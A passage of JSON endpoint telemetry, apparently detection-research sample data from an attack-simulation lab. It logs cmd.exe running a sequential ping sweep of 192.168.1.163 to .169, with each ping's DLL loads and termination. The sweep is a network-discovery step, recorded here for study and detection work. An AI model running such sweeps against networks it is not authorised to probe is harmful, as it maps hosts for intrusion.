"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "process", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572781830000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.163", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6036, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572781980000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "process", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572786840000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.164", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4724, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "process", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572791840000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.165", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4816, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "process", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.166", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1284, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572797029984, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "process", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572801990000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.167", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4664, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "process", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572806840000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.168", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7448, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "process", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572811990000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.169", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6752, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572812150000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - 